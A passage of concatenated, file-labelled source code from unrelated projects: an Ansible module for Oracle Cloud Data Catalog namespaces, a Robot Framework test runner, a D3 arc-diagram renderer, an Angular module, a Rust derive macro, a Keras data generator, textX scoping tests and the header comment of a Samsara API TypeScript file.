- "The date and time the namespace was created, in the format defined by L(RFC3339,https://tools.ietf.org/html/rfc3339).
Example: `2019-03-25T21:10:29.600Z`"
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
time_updated:
description:
- The last time that any change was made to the namespace. An L(RFC3339,https://tools.ietf.org/html/rfc3339) formatted datetime string.
- Returned for get operation
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
created_by_id:
description:
- OCID of the user who created the namespace.
- Returned for get operation
returned: on success
type: str
sample: "ocid1.createdby.oc1..xxxxxxEXAMPLExxxxxx"
updated_by_id:
description:
- OCID of the user who last modified the namespace.
- Returned for get operation
returned: on success
type: str
sample: "ocid1.updatedby.oc1..xxxxxxEXAMPLExxxxxx"
sample: [{
"key": "key_example",
"display_name": "display_name_example",
"description": "description_example",
"is_service_defined": true,
"lifecycle_state": "CREATING",
"time_created": "2013-10-20T19:20:30+01:00",
"time_updated": "2013-10-20T19:20:30+01:00",
"created_by_id": "ocid1.createdby.oc1..xxxxxxEXAMPLExxxxxx",
"updated_by_id": "ocid1.updatedby.oc1..xxxxxxEXAMPLExxxxxx"
}]
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.data_catalog import DataCatalogClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class DataCatalogNamespaceFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: get, list"""
def get_required_params_for_get(self):
return [
"catalog_id",
"namespace_id",
]
def get_required_params_for_list(self):
return [
"catalog_id",
]
def get_resource(self):
optional_get_method_params = [
"fields",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_get_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.call_with_backoff(
self.client.get_namespace,
catalog_id=self.module.params.get("catalog_id"),
namespace_id=self.module.params.get("namespace_id"),
**optional_kwargs
)
def list_resources(self):
optional_list_method_params = [
"display_name",
"display_name_contains",
"lifecycle_state",
"time_created",
"time_updated",
"created_by_id",
"updated_by_id",
"sort_by",
"sort_order",
"fields",
]
optional_kwargs = dict(
(param, self.module.params[param])
for param in optional_list_method_params
if self.module.params.get(param) is not None
)
return oci_common_utils.list_all_resources(
self.client.list_namespaces,
catalog_id=self.module.params.get("catalog_id"),
**optional_kwargs
)
DataCatalogNamespaceFactsHelperCustom = get_custom_class(
"DataCatalogNamespaceFactsHelperCustom"
)
class ResourceFactsHelper(
DataCatalogNamespaceFactsHelperCustom, DataCatalogNamespaceFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
catalog_id=dict(type="str", required=True),
namespace_id=dict(aliases=["id"], type="str"),
fields=dict(
type="list",
elements="str",
choices=[
"key",
"displayName",
"description",
"lifecycleState",
"timeCreated",
"timeUpdated",
"createdById",
"updatedById",
"properties",
],
),
display_name=dict(aliases=["name"], type="str"),
display_name_contains=dict(type="str"),
lifecycle_state=dict(
type="str",
choices=[
"CREATING",
"ACTIVE",
"INACTIVE",
"UPDATING",
"DELETING",
"DELETED",
"FAILED",
"MOVING",
],
),
time_created=dict(type="str"),
time_updated=dict(type="str"),
created_by_id=dict(type="str"),
updated_by_id=dict(type="str"),
sort_by=dict(type="str", choices=["TIMECREATED", "DISPLAYNAME"]),
sort_order=dict(type="str", choices=["ASC", "DESC"]),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="namespace",
service_client_class=DataCatalogClient,
namespace="data_catalog",
)
result = []
if resource_facts_helper.is_get():
result = [resource_facts_helper.get()]
elif resource_facts_helper.is_list():
result = resource_facts_helper.list()
else:
resource_facts_helper.fail()
module.exit_json(namespaces=result)
if __name__ == "__main__":
main()
run_tests.py | #!/usr/bin/env python
import env
import os
import sys
from subprocess import call
#from run_unit_tests import run_unit_tests
ROBOT_ARGS = [
'--doc', 'YamlVariablesOutput',
'--outputdir', '%(outdir)s',
'--escape', 'space:SP',
'--report', 'none',
'--log', 'none',
'--loglevel', 'DEBUG',
'--pythonpath', '%(pythonpath)s',
]
REBOT_ARGS = [
'--outputdir', '%(outdir)s',
'--name', 'YamlVariablesOutput',
'--escape', 'space:SP',
'--critical', 'regression',
'--noncritical', 'inprogress',
]
ARG_VALUES = {'outdir': env.RESULTS_DIR, 'pythonpath': env.SRC_DIR}
def acceptance_tests(interpreter, args):
#ARG_VALUES['browser'] = browser.replace('*', '')
runner = {'python': 'pybot', 'jython': 'jybot', 'ipy': 'ipybot'}[interpreter]
if os.sep == '\\':
runner += '.bat'
execute_tests(runner, args)
return process_output(args)
def execute_tests(runner, args):
if not os.path.exists(env.RESULTS_DIR):
os.mkdir(env.RESULTS_DIR)
command = [runner] + [arg % ARG_VALUES for arg in ROBOT_ARGS] + args + [env.ACCEPTANCE_TEST_DIR]
print ''
print 'Starting test execution with command:\n' + ' '.join(command)
syslog = os.path.join(env.RESULTS_DIR, 'syslog.txt')
# shell=True is only needed on Windows, where the runner is a .bat file
call(command, shell=os.sep == '\\', env=dict(os.environ, ROBOT_SYSLOG_FILE=syslog))
def process_output(args):
print
if _has_robot_27():
call(['python', os.path.join(env.RESOURCES_DIR, 'statuschecker.py'),
os.path.join(env.RESULTS_DIR, 'output.xml')])
rebot = 'rebot' if os.sep == '/' else 'rebot.bat'
rebot_cmd = [rebot] + [ arg % ARG_VALUES for arg in REBOT_ARGS ] + args + \
[os.path.join(ARG_VALUES['outdir'], 'output.xml') ]
rc = call(rebot_cmd, env=os.environ)
if rc == 0:
print 'All critical tests passed'
else:
print '%d critical test%s failed' % (rc, 's' if rc != 1 else '')
return rc
def _has_robot_27():
try:
from robot.result import ExecutionResult
except:
return False
return True
def _exit(rc):
sys.exit(rc)
def _help():
print 'Usage: python run_tests.py python|jython|ipy [options]'
print
print 'See README.txt for details.'
return 255
#def _run_unit_tests():
# print 'Running unit tests'
# failures = run_unit_tests()
# if failures != 0:
# print '\n%d unit tests failed - not running acceptance tests!' % failures
# else:
# print 'All unit tests passed'
# return failures
if __name__ == '__main__':
if not len(sys.argv) > 1:
_exit(_help())
# unit_failures = _run_unit_tests()
# if unit_failures:
# _exit(unit_failures)
interpreter = sys.argv[1]
# browser = sys.argv[2].lower()
args = sys.argv[2:]
_exit(acceptance_tests(interpreter, args))
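# Example invocation (the first argument picks the runner per acceptance_tests
# above; any remaining options are passed straight through to Robot Framework
# and rebot, so '--include smoke' below is illustrative, not defined here):
#   python run_tests.py python --include smoke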
render.js | import * as d3 from 'd3'
import * as louvain from 'louvain'
/*
Credits:
Inspired by https://observablehq.com/@d3/arc-diagram
*/
export function render(svgNode, data, visualOptions, mapping, originalData) {
const {
// artboard
width,
height,
background,
marginTop,
marginRight,
marginBottom,
marginLeft,
// chart
minDiameter,
maxDiameter,
nodeSize,
orderNodesBy,
linkOpacity,
sameSide,
} = visualOptions
const margin = {
top: marginTop,
right: marginRight,
bottom: marginBottom,
left: marginLeft,
}
const chartWidth = width - margin.left - margin.right
const chartHeight = height - margin.top - margin.bottom
// create a graph data file from the incoming data
let graph = graphFromEdgesTable(data)
//compute nodes modularity
if (orderNodesBy == 'Minimize overlaps') {
let community = louvain
.jLouvain()
.nodes(graph.nodes.map((d) => d.id))
.edges(
graph.links.map((d) => ({
source: d.source.id,
target: d.target.id,
weight: d.value,
}))
)
let results = community()
graph.nodes.forEach((n) => (n.community = results[n.id]))
}
// sort nodes
// 'Name', 'Links count (degree)', 'Total value'
graph.nodes.sort((a, b) => {
switch (orderNodesBy) {
case 'Total value':
return d3.descending(a.totalValue, b.totalValue)
case 'Links count (degree)':
return d3.ascending(a.degree, b.degree)
case 'Name':
return d3.ascending(a.id, b.id)
case 'Minimize overlaps':
return d3.ascending(a.community, b.community)
default:
return 0
}
})
// size scale
const sizeScale = d3
.scaleSqrt()
.domain([0, d3.max(graph.nodes, (d) => d[nodeSize])])
.range([minDiameter, maxDiameter])
// widthScale (for nodes)
const widthScale = d3
.scaleLinear()
.domain([0, d3.max(graph.links, (d) => d.value)])
.range([0, maxDiameter])
// get the total size
const totalValue = d3.sum(graph.nodes, (d) => sizeScale(d[nodeSize]) * 2)
// compute padding
const padding = (chartWidth - totalValue) / (graph.nodes.length - 1)
// compute x positions. @TODO could be improved
let xPos = 0
graph.nodes.forEach((d, i) => {
d.x = xPos + sizeScale(d[nodeSize])
d.y = sameSide ? chartHeight - maxDiameter : chartHeight / 2
xPos += padding + sizeScale(d[nodeSize]) * 2
})
// add background
d3.select(svgNode)
.append('rect')
.attr('width', width)
.attr('height', height)
.attr('x', 0)
.attr('y', 0)
.attr('fill', background)
.attr('id', 'background')
const svg = d3
.select(svgNode)
.append('g')
.attr('transform', 'translate(' + margin.left + ',' + margin.top + ')')
.attr('id', 'viz')
// draw links
const arcs = svg.append('g').attr('id', 'arcs')
arcs
.selectAll('path')
.data(graph.links)
.enter()
.append('path')
.attr('d', (d) => {
const r = Math.abs(d.source.x - d.target.x) / 2
const sweep = sameSide ? (d.source.x < d.target.x ? 1 : 0) : 1
return `M${d.source.x},${d.source.y}A${r},${r} 0,0,${sweep} ${d.target.x},${d.target.y}`
})
.attr('fill', 'none')
.attr('stroke', 'gray')
.attr('stroke-width', (d) => widthScale(d.value))
.attr('opacity', linkOpacity)
// draw nodes
const nodes = svg
.append('g')
.attr('id', 'nodes')
.selectAll('g')
.data(graph.nodes)
.enter()
.append('g')
// add circles
nodes
.append('circle')
.attr('cx', (d) => d.x)
.attr('cy', (d) => d.y)
.attr('r', (d) => sizeScale(d[nodeSize]))
// add labels
nodes
.append('text')
// .attr('x', (d) => d.x)
// .attr('y', (d) => d.y + sizeScale(d[nodeSize]))
.text((d) => d.id)
.attr(
'transform',
(d) => `translate(${d.x},${d.y + sizeScale(d[nodeSize]) + 5}) rotate(-90)`
)
.attr('alignment-baseline', 'middle')
.attr('font-family', 'Helvetica, Arial, sans-serif')
.attr('font-size', 12)
.attr('text-anchor', 'end')
}
/*
helper function to create a graph js object
*/
function graphFromEdgesTable(_edgesTable) {
// links are a deep copy of the dataset, to avoid modification of the original data variable
let links = _edgesTable.map((d) => Object.assign({}, d))
const nodes = Array.from(
new Set(links.flatMap((l) => [l.source, l.target])),
(id) => ({
id,
outLinks: [],
inLinks: [],
totalValue: 0,
inValue: 0,
outValue: 0,
degree: 0,
inDegree: 0,
outDegree: 0,
default: 1,
})
)
const nodeById = new Map(nodes.map((d) => [d.id, d]))
// links are now re-populated and linked to node objects
links = links.map(({ source, target, value }) => ({
source: nodeById.get(source),
target: nodeById.get(target),
value,
}))
// links added to nodes objects
for (const link of links) {
const { source, target, value } = link
//update source
source.outLinks.push(link)
source.totalValue += link.value
source.outValue += link.value
source.degree++
source.outDegree++
//update target
target.inLinks.push(link)
target.degree++
target.inDegree++
target.totalValue += link.value
target.inValue += link.value
}
return { nodes, links }
}
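/*
Input sketch for graphFromEdgesTable (inferred from the mapping above: each row
needs exactly `source`, `target` and `value` columns; the rows are illustrative):
const data = [
  { source: 'a', target: 'b', value: 3 },
  { source: 'b', target: 'c', value: 1 },
]
graphFromEdgesTable(data) // -> { nodes, links } with per-node degree and value tallies
*/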
fw.module.ts | import { NgModule } from '@angular/core';
import { CommonModule } from '@angular/common';
import { RouterModule } from '@angular/router';
import { FormsModule } from '@angular/forms';
import { FrameworkBodyComponent } from './framework-body/framework-body.component';
import { ContentComponent } from './content/content.component';
import { TitleBarComponent } from './title-bar/title-bar.component';
import { FrameworkConfigService } from './services/framework-config.service';
import { TopBarComponent } from './top-bar/top-bar.component';
import { StatusBarComponent } from './status-bar/status-bar.component';
import { ScreenService } from './services/screen.service';
import { ScreenLarge } from './directives/screen-large.directive';
import { ScreenBelowLarge } from './directives/screen-below-large.directive';
import { MenuService } from './services/menu.service';
import { MenuComponent } from './menus/menu/menu.component';
import { MenuItemComponent } from './menus/menu-item/menu-item.component';
import { PopupMenuComponent } from './menus/popup-menu/popup-menu.component';
import { SignInComponent } from './users/sign-in/sign-in.component';
import { RegisterUserComponent } from './users/register-user/register-user.component';
@NgModule({
imports: [
CommonModule,
RouterModule,
FormsModule
],
declarations: [
FrameworkBodyComponent,
ContentComponent,
TitleBarComponent,
TopBarComponent,
StatusBarComponent,
ScreenLarge,
ScreenBelowLarge,
MenuComponent,
MenuItemComponent,
PopupMenuComponent,
SignInComponent,
RegisterUserComponent
],
providers: [
FrameworkConfigService,
ScreenService,
MenuService
],
exports: [
FrameworkBodyComponent
]
})
export class FwModule { }
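// Usage sketch (a standard Angular consumer module; AppModule is illustrative):
// @NgModule({ imports: [BrowserModule, FwModule], ... })
// export class AppModule { }
// Only FrameworkBodyComponent is exported above, so templates outside this
// module can use it directly; the other declarations stay internal.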
interjection.dictionary.js | import Dictionary from '../dictionary';
import Interjection from '../partsOfSpeech/interjection';
import Word from '../word';
/**
* @param {String} word word to search for
* @returns {Object} Interjection if successful, Word if unsuccessful
*/
function findInterjection(word) {
const list = this.list.filter(obj => word.indexOf(obj.interjection.toLowerCase()) !== -1);
const typedList = list.map(intObj => new Interjection(
intObj.interjection,
intObj.type,
// eslint-disable-next-line function-paren-newline
intObj.wordCategory));
return typedList.length === 0 ? new Word(word) : typedList[0];
}
/** Interjection Dictionary
* @param {Array} list Interjections with types and wordCategories
* @param {String} language two-letter abbreviation of language
* @member {list} Array of typed Interjections
* @member {language} String language for the dictionary
* @method {findWord} searches for a word in the dictionary and returns an Interjection or a Word
*/
function InterjectionDictionary(list, language) {
const sortedList = list.sort((a, b) => {
if (a.interjection < b.interjection) return -1;
if (a.interjection > b.interjection) return 1;
return 0;
});
this.GrammarModel = Interjection;
this.partOfSpeech = 'interjection';
this.list = sortedList;
this.language = language;
}
InterjectionDictionary.prototype = Object.create(Dictionary.prototype);
InterjectionDictionary.prototype.findWord = findInterjection;
export default InterjectionDictionary;
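// Usage sketch (entries need `interjection`, `type` and `wordCategory` keys, as
// read by findInterjection above; the sample entry and language code are illustrative):
// const dict = new InterjectionDictionary(
//   [{ interjection: 'Wow', type: 'primary', wordCategory: 'emotive' }], 'en');
// dict.findWord('wow!'); // -> Interjection; unknown words come back as Word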
queriable.rs | // Copyright (c) Facebook, Inc. and its affiliates.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
use crate::helper::{get_metadata, occurrence_error, parse_option, to_camelcase};
use proc_macro2::{Span, TokenStream};
use quote::quote;
use syn::{
parse::{Parse, ParseStream},
spanned::Spanned,
DeriveInput, Field, Ident, Token,
};
mod kw {
use syn::custom_keyword;
// struct metadata
custom_keyword!(field_id_name);
// field metadata
custom_keyword!(ignore);
custom_keyword!(subquery);
custom_keyword!(preferred_name);
}
pub enum StructMeta {
FieldIdName { kw: kw::field_id_name, value: Ident },
}
impl Parse for StructMeta {
fn parse(input: ParseStream) -> syn::Result<Self> {
let lookahead = input.lookahead1();
if lookahead.peek(kw::field_id_name) {
let kw = input.parse()?;
let _: Token![=] = input.parse()?;
let value = input.parse()?;
Ok(StructMeta::FieldIdName { kw, value })
} else {
Err(lookahead.error())
}
}
}
impl Spanned for StructMeta {
fn span(&self) -> Span {
match self {
StructMeta::FieldIdName { kw, .. } => kw.span,
}
}
}
pub enum FieldMeta {
Ignore(kw::ignore),
Subquery {
kw: kw::subquery,
value: Option<syn::Type>,
},
PreferredName {
kw: kw::preferred_name,
value: Ident,
},
}
impl Parse for FieldMeta {
fn parse(input: ParseStream) -> syn::Result<Self> {
let lookahead = input.lookahead1();
if lookahead.peek(kw::ignore) {
Ok(FieldMeta::Ignore(input.parse()?))
} else if lookahead.peek(kw::subquery) {
let kw = input.parse()?;
// Optionally accept an Ident for subquery FieldId type.
if input.peek(Token![=]) {
let _: Token![=] = input.parse()?;
let value = Some(input.parse()?);
Ok(FieldMeta::Subquery { kw, value })
} else {
Ok(FieldMeta::Subquery { kw, value: None })
}
} else if lookahead.peek(kw::preferred_name) {
let kw = input.parse()?;
let _: Token![=] = input.parse()?;
let value = input.parse()?;
Ok(FieldMeta::PreferredName { kw, value })
} else {
Err(lookahead.error())
}
}
}
impl Spanned for FieldMeta {
fn span(&self) -> Span {
match self {
FieldMeta::Ignore(kw) => kw.span,
FieldMeta::Subquery { kw, .. } => kw.span,
FieldMeta::PreferredName { kw, .. } => kw.span,
}
}
}
#[derive(Clone, Debug)]
struct QueriableStructProps {
pub field_id_name: Ident,
pub ident: Ident,
}
fn get_queriable_struct_props(ast: &DeriveInput) -> syn::Result<QueriableStructProps> {
let mut field_id_name = None;
let mut field_id_name_kw = None;
for meta in get_metadata("queriable", &ast.attrs)? {
match meta {
StructMeta::FieldIdName { value, kw } => {
if let Some(fst_kw) = field_id_name_kw {
return Err(occurrence_error(fst_kw, kw, "field_id_name"));
}
field_id_name_kw = Some(kw);
field_id_name = Some(value);
}
}
}
Ok(QueriableStructProps {
field_id_name: field_id_name
// Add `FieldId` suffix for default FieldId enum name.
.unwrap_or_else(|| Ident::new(&format!("{}FieldId", ast.ident), ast.ident.span())),
ident: ast.ident.clone(),
})
}
#[derive(Clone, Debug)]
struct QueriableFieldProps {
pub ignore: bool,
pub subquery: Option<syn::Type>,
pub preferred_name: Ident,
pub ident: Ident,
pub variant_name: Ident,
pub option_type: Option<syn::Type>,
}
fn get_queriable_field_props(field: &Field) -> syn::Result<QueriableFieldProps> {
let mut ignore = false;
let mut subquery = None;
let mut preferred_name = None;
let mut ignore_kw = None;
let mut subquery_kw = None;
let mut preferred_name_kw = None;
let option_type = parse_option(&field.ty);
for meta in get_metadata("queriable", &field.attrs)? {
match meta {
FieldMeta::Ignore(kw) => {
if let Some(fst_kw) = ignore_kw {
return Err(occurrence_error(fst_kw, kw, "ignore"));
}
ignore_kw = Some(kw);
ignore = true;
}
FieldMeta::Subquery { value, kw } => {
if let Some(fst_kw) = subquery_kw {
return Err(occurrence_error(fst_kw, kw, "subquery"));
}
subquery_kw = Some(kw);
// If no type provided, infer from field type by adding `FieldId`
// suffix, which may be wrapped by Option.
subquery = value.or_else(|| {
let base_type = option_type.as_ref().unwrap_or(&field.ty);
match base_type {
syn::Type::Path(ty_path) => {
let mut ty_path = ty_path.clone();
let last_ident = &ty_path.path.segments.last()?.ident;
ty_path.path.segments.last_mut()?.ident =
Ident::new(&format!("{}FieldId", last_ident), last_ident.span());
Some(syn::Type::Path(ty_path))
}
_ => None,
}
});
if subquery.is_none() {
return Err(syn::Error::new(
field.ty.span(),
"Failed to infer subquery FieldId type",
));
}
}
FieldMeta::PreferredName { value, kw } => {
if let Some(fst_kw) = preferred_name_kw {
return Err(occurrence_error(fst_kw, kw, "preferred_name"));
}
preferred_name_kw = Some(kw);
preferred_name = Some(value.clone());
}
}
}
let ident = field
.ident
.clone()
.ok_or_else(|| syn::Error::new(field.span(), "This macro only support named fields"))?;
let preferred_name = preferred_name.unwrap_or_else(|| ident.clone());
let variant_name = to_camelcase(&preferred_name);
Ok(QueriableFieldProps {
ignore,
subquery,
preferred_name,
ident,
variant_name,
option_type,
})
}
pub fn queriable_derive_impl(ast: &DeriveInput) -> syn::Result<TokenStream> {
let struct_props = get_queriable_struct_props(ast)?;
let input_ident = struct_props.ident;
let field_id_ident = struct_props.field_id_name;
let fields = match &ast.data {
syn::Data::Struct(syn::DataStruct {
fields: syn::Fields::Named(fields),
..
}) => &fields.named,
_ => {
return Err(syn::Error::new(
Span::call_site(),
"This macro only supports struct with named fields.",
));
}
};
let mut all_field_props = Vec::new();
for field in fields {
let field_props = get_queriable_field_props(&field)?;
if !field_props.ignore {
all_field_props.push(field_props);
}
}
let field_id_variants = all_field_props.iter().map(|field_props| {
let variant_name = &field_props.variant_name;
match &field_props.subquery {
Some(subquery_field_id_type) => quote! {
#variant_name(#subquery_field_id_type),
},
None => quote! {
#variant_name,
},
}
});
let queriable_match_arms = all_field_props.iter().map(|field_props| {
let variant_name = &field_props.variant_name;
let field_ident = &field_props.ident;
if field_props.subquery.is_some() {
let query = if field_props.option_type.is_some() {
quote! { self.#field_ident.as_ref().and_then(|q| q.query(field_id)) }
} else {
quote! { self.#field_ident.query(field_id) }
};
quote! { Self::FieldId::#variant_name(field_id) => #query, }
} else {
let query = if field_props.option_type.is_some() {
quote! { self.#field_ident.as_ref().map(Field::from) }
} else {
quote! { std::option::Option::Some(Field::from(&self.#field_ident)) }
};
quote! { Self::FieldId::#variant_name => #query, }
}
});
Ok(quote! {
#[derive(
Clone,
Debug,
PartialEq,
::below_derive::EnumIter,
::below_derive::EnumFromStr,
::below_derive::EnumToString
)]
pub enum #field_id_ident {
#(#field_id_variants)*
}
impl FieldId for #field_id_ident {
type Queriable = #input_ident;
}
impl Queriable for #input_ident {
type FieldId = #field_id_ident;
fn query(&self, field_id: &Self::FieldId) -> ::std::option::Option<Field> {
match field_id {
#(#queriable_match_arms)*
}
}
}
})
}
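// Usage sketch (attribute names match the `queriable` keywords parsed above; the
// struct, field names and the derive entry point itself are illustrative):
// #[derive(Queriable)]
// #[queriable(field_id_name = ProcStatFieldId)]
// struct ProcStat {
//     pub count: u64,                  // -> ProcStatFieldId::Count
//     #[queriable(preferred_name = mem)]
//     pub memory: Option<u64>,         // -> ProcStatFieldId::Mem
//     #[queriable(subquery)]
//     pub inner: InnerStat,            // -> ProcStatFieldId::Inner(InnerStatFieldId)
//     #[queriable(ignore)]
//     pub scratch: String,             // no variant generated
// }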
data_generator.py | from pathlib import PurePath
from typing import Tuple, List, Callable
import numpy as np
from tensorflow.keras.utils import Sequence
from imagededup.utils.image_utils import load_image
class DataGenerator(Sequence):
"""Class inherits from Keras Sequence base object, allows to use multiprocessing in .fit_generator.
Attributes:
image_dir: Path of image directory.
batch_size: Number of images per batch.
basenet_preprocess: Basenet specific preprocessing function.
target_size: Dimensions that images get resized into when loaded.
"""
def __init__(
self,
image_dir: PurePath,
batch_size: int,
basenet_preprocess: Callable,
target_size: Tuple[int, int],
) -> None:
"""Init DataGenerator object.
"""
self.image_dir = image_dir
self.batch_size = batch_size
self.basenet_preprocess = basenet_preprocess
self.target_size = target_size
self.counter = 0
self._get_image_files()
self.on_epoch_end()
def _get_image_files(self) -> None:
self.invalid_image_idx = []
self.image_files = sorted(
[
i.absolute()
for i in self.image_dir.glob('*')
if not i.name.startswith('.')]
) # ignore hidden files
def on_epoch_end(self) -> None:
"""Method called at the end of every epoch.
"""
self.indexes = np.arange(len(self.image_files))
self.valid_image_files = [
j for i, j in enumerate(self.image_files) if i not in self.invalid_image_idx
]
def __len__(self) -> int:
"""Number of batches in the Sequence."""
return int(np.ceil(len(self.image_files) / self.batch_size))
def __getitem__(self, index: int) -> Tuple[np.array, np.array]:
"""Get batch at position `index`.
"""
batch_indexes = self.indexes[
index * self.batch_size : (index + 1) * self.batch_size
]
batch_samples = [self.image_files[i] for i in batch_indexes]
X = self._data_generator(batch_samples)
return X
def _data_generator(
self, image_files: List[PurePath]
) -> Tuple[np.array, np.array]:
"""Generate data from samples in specified batch."""
# initialize images and labels tensors for faster processing
X = np.empty((len(image_files), *self.target_size, 3))
invalid_image_idx = []
for i, image_file in enumerate(image_files):
# load and randomly augment image
img = load_image(
image_file=image_file, target_size=self.target_size, grayscale=False
)
if img is not None:
X[i, :] = img
else:
invalid_image_idx.append(i)
self.invalid_image_idx.append(self.counter)
self.counter += 1
if invalid_image_idx:
X = np.delete(X, invalid_image_idx, axis=0)
# apply basenet specific preprocessing
# input is 4D numpy array of RGB values within [0, 255]
X = self.basenet_preprocess(X)
return X
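# Usage sketch (MobileNet's preprocess_input is one valid `basenet_preprocess`
# Callable; the directory path is illustrative):
#   from pathlib import Path
#   from tensorflow.keras.applications.mobilenet import preprocess_input
#   gen = DataGenerator(image_dir=Path('images'), batch_size=64,
#                       basenet_preprocess=preprocess_input, target_size=(224, 224))
#   batch = gen[0]  # preprocessed array of shape (<=64, 224, 224, 3)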
lesson-oo-415.py | def isPointInSquare(x, y):
return 1.0 >= x >= -1.0 and 1.0 >= y >= -1.0
x = float(input())
y = float(input())
if isPointInSquare(x, y):
print('YES')
else:
print('NO')
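# e.g. inputs 0.5 and -0.5 print YES; 1.5 and 0 print NO (the square is [-1, 1] x [-1, 1])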
test_scoping.py | import os
from textx.metamodel import metamodel_from_file
from textx.model import children_of_type
from pynmodl.nmodl import NModlCompiler
mm = metamodel_from_file(
os.path.join(os.path.dirname(__file__), '../../grammar/nmodl.tx'))
mm.register_obj_processors({'VarRef': NModlCompiler().handle_varref})
def refs_in(node):
return children_of_type('VarRef', node)
def test_scoping():
p = """
PARAMETER {
v (mV)
}
STATE { x }
INITIAL {
LOCAL v
v = 10
x = -v : v is local
}
FUNCTION f(v) {
if(2 > 1){
LOCAL v
v = 123
f = v : v is local
}
else{
f = -v : v is funcpar
}
}
DERIVATIVE dx {
x' = f(x) + v : v is par
}
"""
blocks = mm.model_from_str(p).blocks
(parameter, state, initial, function_f, derivative) = blocks
locals_in_init = children_of_type('Local', initial)
assert refs_in(initial)[0].var == locals_in_init[0]
locals_in_function_f = children_of_type('Local', function_f)
assert refs_in(function_f)[0].var == locals_in_function_f[0]
assert refs_in(function_f)[2].var == locals_in_function_f[0]
assert type(refs_in(function_f)[-1].var).__name__ == 'FuncPar'
assert refs_in(derivative)[-1].var == parameter.parameters[0]
def test_multiple_locals():
p = """
PARAMETER {
v (mV)
}
STATE { n }
FUNCTION alpha(x)(/ms){
LOCAL a
a = 0.1
if(fabs(x) > a){
alpha=a*x/(1-exp(-x))
}else{
alpha=a/(1-0.5*x)
}
}
DERIVATIVE dn {
LOCAL a
a = 10
n' = alpha((v + 55)/a)}
"""
blocks = mm.model_from_str(p).blocks
(parameter, state, alpha, dn) = blocks
locals_in_alpha = children_of_type('Local', alpha)
alpha_a = locals_in_alpha[0]
alpha_x = alpha.pars[0]
assert refs_in(alpha)[0].var == alpha_a # _a_ = 0.1
assert refs_in(alpha)[1].var == alpha_x # fabs(_x_) > a
assert refs_in(alpha)[2].var == alpha_a # fabs(x) > _a_
assert refs_in(alpha)[3].var == alpha # _alpha_=a*x/(1-exp(-x))
assert refs_in(alpha)[4].var == alpha_a # alpha=_a_*x/(1-exp(-x))
assert refs_in(alpha)[5].var == alpha_x # alpha=a*_x_/(1-exp(-x))
JobsDeleteJobNotFoundErrorResponseBody.ts | /* tslint:disable */
/* eslint-disable */
/**
* Samsara API
* <style type=\"text/css\"> n { padding: 1em; width: 100%; display: block; margin: 28px 0; } n.info { background-color: rgba(0, 51, 160, 0.1); } n.warning { background-color: #fdf6e3; } i:before { margin-right: 6px; } nh { font-size: 1.5rem; font-weight: 700; line-height: 1.1; display: block; } nb { margin-top: 10px; padding-left: 22px; display: block; } </style> # Overview <n class=\"info\"> <nh> <i class=\"fa fa-info-circle\"></i> Something new! </nh> <nb> Welcome Samsara\'s new and improved API. Check out our FAQ [here](https://developers.samsara.com/docs/introducing-our-next-generation-api) to see what\'s changed and learn how to get started.<br> <br> Want to access the legacy API docs? You can find them [here](https://www.samsara.com/api-legacy).<br> <br> *Note: Because this is a new set of APIs, we have not transitioned all endpoints over to this standard. Endpoints that still use the legacy standards are indicated in the reference documentation. If you can\'t find an API that you\'re looking for, we encourage you to look for it in our [legacy API docs](https://www.samsara.com/api-legacy) as we continue to transition all endpoints over. Check back here for updates!*<br> <br> Submit your feedback [here](https://forms.gle/r4bs6HQshQAvBuwv6)! </nb> </n> Samsara provides API endpoints so that you can build powerful applications and custom solutions with sensor data. Samsara has endpoints available to track and analyze sensors, vehicles, and entire fleets. The Samsara API is a [RESTful API](https://en.wikipedia.org/wiki/Representational_state_transfer). It uses standard [HTTP](https://en.wikipedia.org/wiki/Hypertext_Transfer_Protocol) authentication, verbs, and response codes, and it returns [JSON](http://www.json.org/) response bodies. If you\'re familiar with what you can build with a REST API, then this will be your go-to API reference. Visit [developers.samsara.com](https://developers.samsara.com) to find getting started guides and an API overview. If you have any questions, please visit https://samsara.com/help. ## Endpoints All our APIs can be accessed through HTTP requests to URLs like: ``` https://api.samsara.com/<endpoint> ``` For EU customers, this URL will be: ``` https://api.eu.samsara.com/<endpoint> ``` <n class=\"warning\"> <nh> <i class=\"fa fa-exclamation-circle\"></i> Note </nh> <nb> Legacy endpoints will have the URL: `https://api.samsara.com/v1/<endpoint>` or `https://api.eu.samsara.com/v1/<endpoint>` </nb> </n> ## Authentication To authenticate your API request you will need to include your secret token. You can manage your API tokens in the [Dashboard](https://cloud.samsara.com). They are visible under `Settings->Organization->API Tokens`. Your API tokens carry many privileges, so be sure to keep them secure. Do not share your secret API tokens in publicly accessible areas such as GitHub, client-side code, and so on. Authentication to the API is performed via Bearer Token in the HTTP Authorization header. Provide your API token as the `access_token` value in an `Authorization: Bearer` header. You do not need to provide a password: ```curl Authorization: Bearer {access_token} ``` All API requests must be made over [HTTPS](https://en.wikipedia.org/wiki/HTTPS). Calls made over plain HTTP or without authentication will fail. ### OAuth2 If building an application for our marketplace, our API is accessible via. OAuth2 as well. 
| Type | Value | | ------------- |:-------------:| | Security scheme | OAuth2 | | OAuth2 Flow | accessCode | | Authorization URL | https://api.samsara.com/oauth2/authorize | | Token URL | https://api.samsara.com/oauth2/token | ## Common Patterns You can find more info about request methods, response codes, error codes, versioning, pagination, timestamps, and mini-objects [here](https://developers.samsara.com/docs/common-structures).
*
